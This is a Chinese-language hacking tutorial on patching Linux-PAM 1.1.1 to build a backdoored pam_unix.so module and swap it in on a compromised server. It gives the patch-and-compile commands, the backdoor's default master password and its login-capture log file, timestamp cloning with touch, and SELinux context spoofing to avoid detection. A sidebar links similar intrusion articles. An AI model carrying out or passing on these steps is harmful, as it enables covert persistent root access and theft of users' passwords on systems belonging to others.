PAM后门编译安装
发布时间:2014-07-15 11:50:30作者:知识屋
PAM有许多版本,我们首先要从官方目标所使用的PAM包,并在本地修改后编译生成出pam_unix.so文件进行替换
http://www.linux-pam.org/library/
https://fedorahosted.org/releases/l/i/linux-pam/
获取目标所使用的PAM版本:
rpm -qa|grep pam
下载后,在对应的系统环境下(32或x86_64位系统下)编译生成后门,patch目录下的“pam_unix_auth.c.patch”文件就是
补丁文件,pam_unix_auth.c 是PAM
1.1.1版本pam_unix.so的源文件,仅作参考。我们将补丁文件移动到源码目录,并使用patch命令对PAM源代码打补丁,然后编译生成即可。
mv pam_unix_auth.c.patch -PAM-1.1.1/modules/pam_unix/cd Linux-PAM-1.1.1/modules/pam_unixpatch < pam_unix_auth.c.patchcd ../.././configure & make
编译完后的文件在:modules/pam_unix/.libs/pam_unix.so
后门的默认密码:root123
记录密码的文件:/tmp/pslog
将生成的pam_uninx.so文件覆盖/lib/secruity/pam_unix.so或/lib64/security/pam_unix.so(记得备份原始文件),修改文件属性,手动建立密码保存文件,并使用touch命令克隆文件时间,如果selinux是开启的环境,一定要关掉或者设置好上下文pam_unix.so才能正常工作,搞定ok。
手动创建密码文件:
touch /tmp/pslog;chmod a+w /tmp/pslog
克隆原始文件时间:
touch pam_unix.so -r pam_unix.so.src
查看Selinux上下文:
ls -Z pam_unix.so.src (备份的原始文件)
设置Selinux上下文:
chcon –reference=pam_unix.so.src pam_unix.so
编译报错问题:
64位系统编译可能会遇到yywrap()函数未定义错误,只需安装flex软件包就可以正常编译了
示例:
yum install flex
知识阅读
软件推荐
更多 >
-
1菜鸟简单抓肉鸡(如何抓肉鸡)
2011-06-17
-
2
电脑开机时出现lass.exe进程是病毒吗?
-
3
自拍须谨慎!教你如何通过照片定位查看拍摄地点
-
4
电脑病毒最基础知识
-
5
黑客学员必须了解的C语言技术
-
6
精典详细内网渗透专题文章
-
7
教你破解Tp-Link的无线路由密码
-
8
解决SecureCRT中文显示乱码
-
9
QQ电脑管家和360哪个好?横评实测对比
-
10
攻防实战:无线网络路由入侵过程
